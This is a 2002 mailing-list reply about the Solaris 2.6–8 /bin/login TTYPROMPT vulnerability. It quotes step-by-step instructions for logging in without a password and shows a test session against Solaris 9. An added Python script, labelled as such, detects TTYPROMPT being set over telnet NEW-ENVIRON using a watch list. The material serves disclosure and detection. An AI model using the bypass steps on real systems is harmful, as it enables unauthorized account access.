On Wed, Oct 02, 2002 at 12:13:09PM -0400, Jonathan S wrote:
> Hello,
>
> Solaris 2.6, 7, and 8 /bin/login has a vulnerability involving the
> environment variable TTYPROMPT. This vulnerability has already been
> reported to BugTraq and a patch has been released by Sun.
> However, a very simple exploit, which does not require any code to be
> compiled by an attacker, exists. The exploit requires the attacker to
> simply define the environment variable TTYPROMPT to a 6 character string,
> inside telnet. I believe this overflows an integer inside login, which
> specifies whether or not the user has been authenticated (just a guess).
> Once connected to the remote host, you must type the username, followed by
> 64 " c"s, and a literal "\n". You will then be logged in as the user
> without any password authentication. This should work with any account
> except root (unless remote root login is allowed).

Looks like Solaris 9 is not vulnerable to this:
[idubraws@elrond idubraws] 6 $ telnet
telnet> environ define TTYPROMPT abcdef
telnet> o 192.168.155.2
Trying 192.168.155.2...
Connected to 192.168.155.2.
Escape character is '^]'.
SunOS 5.9
login:
It automatically drops you to the login prompt. Perhaps this is fixed by a
patch that got rolled into 9?
Ido
--
===============================================================================
|Ido Dubrawsky E-mail: [EMAIL PROTECTED]
| | |Network Consulting Engineer
:|: :|: |VSEC Technical Marketing, SAFE Architecture
:|||: :|||: |Cisco Systems, Inc.
.:|||||||:..:|||||||:. |Austin, TX. 78759
===============================================================================
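A defender-side check to go with the exploit description quoted above, added here as an example; it is not part of the original thread and not Sun's or Cisco's code. Telnet's `environ define` is carried to the server as a NEW-ENVIRON subnegotiation (RFC 1572), so a session capture or an inline telnet proxy can spot a client pushing TTYPROMPT before /bin/login ever sees the variable. The byte stream, the watch list and the function names are constructed for this example.

```python
"""Flag TTYPROMPT being pushed over telnet NEW-ENVIRON (RFC 1572).

Added example, not from the original thread. The sample stream below is
constructed; the function names are this example's own.
"""

# Telnet protocol constants (RFC 854 / RFC 1572)
IAC, SB, SE = 255, 250, 240
WILL, WONT, DO, DONT = 251, 252, 253, 254
NEW_ENVIRON = 39
IS, SEND, INFO = 0, 1, 2          # NEW-ENVIRON sub-commands
VAR, VALUE, ESC, USERVAR = 0, 1, 2, 3

# Variables a remote client has no business defining on this server (constructed watch list)
WATCHLIST = {"TTYPROMPT"}


def iter_subnegotiations(data):
    """Yield (option, payload) for each IAC SB <option> ... IAC SE in data.

    Doubled IAC bytes inside the payload are unescaped; other IAC commands
    are skipped at their proper length so a stray 0xFF in the body cannot
    desynchronise the parser.
    """
    i, n = 0, len(data)
    while i < n:
        if data[i] != IAC or i + 1 >= n:
            i += 1
            continue
        cmd = data[i + 1]
        if cmd == SB and i + 2 < n:
            option, j, payload = data[i + 2], i + 3, bytearray()
            while j < n:
                if data[j] == IAC and j + 1 < n:
                    if data[j + 1] == SE:
                        break
                    if data[j + 1] == IAC:        # escaped data byte 0xFF
                        payload.append(IAC)
                        j += 2
                        continue
                payload.append(data[j])
                j += 1
            yield option, bytes(payload)
            i = j + 2
        elif cmd in (WILL, WONT, DO, DONT):
            i += 3                                  # IAC <cmd> <option>
        else:
            i += 2                                  # IAC <cmd> or IAC IAC


def parse_environ(payload):
    """Decode a NEW-ENVIRON IS/INFO body into {name: value_or_None}."""
    if not payload or payload[0] not in (IS, INFO):
        return {}
    pairs, cur, i = [], None, 1
    while i < len(payload):
        b = payload[i]
        if b in (VAR, USERVAR):                     # start of a new name
            pairs.append([bytearray(), None])
            cur = pairs[-1][0]
        elif b == VALUE and pairs:                  # start of that name's value
            pairs[-1][1] = bytearray()
            cur = pairs[-1][1]
        elif b == ESC and i + 1 < len(payload):     # ESC quotes the next byte
            i += 1
            if cur is not None:
                cur.append(payload[i])
        elif cur is not None:
            cur.append(b)
        i += 1
    return {name.decode("latin-1"): (None if val is None else val.decode("latin-1"))
            for name, val in pairs}


def environ_from_stream(data):
    """Merge every NEW-ENVIRON IS/INFO the client sent in this stream."""
    env = {}
    for option, payload in iter_subnegotiations(data):
        if option == NEW_ENVIRON:
            env.update(parse_environ(payload))
    return env


def flag_watchlisted(data):
    """Return [(name, value)] for watch-listed variables the client tried to set."""
    env = environ_from_stream(data)
    return sorted((k, v) for k, v in env.items() if k in WATCHLIST)


# Constructed client-to-server bytes: WILL NEW-ENVIRON, then an IS carrying
# TTYPROMPT (as a USERVAR, the way `environ define` sends unknown names) and USER.
SAMPLE_STREAM = (
    bytes([IAC, WILL, NEW_ENVIRON])
    + bytes([IAC, SB, NEW_ENVIRON, IS, USERVAR]) + b"TTYPROMPT"
    + bytes([VALUE]) + b"abcdef"
    + bytes([VAR]) + b"USER" + bytes([VALUE]) + b"idubraws"
    + bytes([IAC, SE])
    + b"\r\n"
)

if __name__ == "__main__":
    for name, value in flag_watchlisted(SAMPLE_STREAM):
        print(f"ALERT: client defined {name}={value!r} via NEW-ENVIRON")
```

The same parser works on the client-to-server half of a captured telnet session or as a filter in an inline proxy; an alert on TTYPROMPT is a signal that the vendor patch Jonathan mentions has not been applied on a host that still exposes telnet.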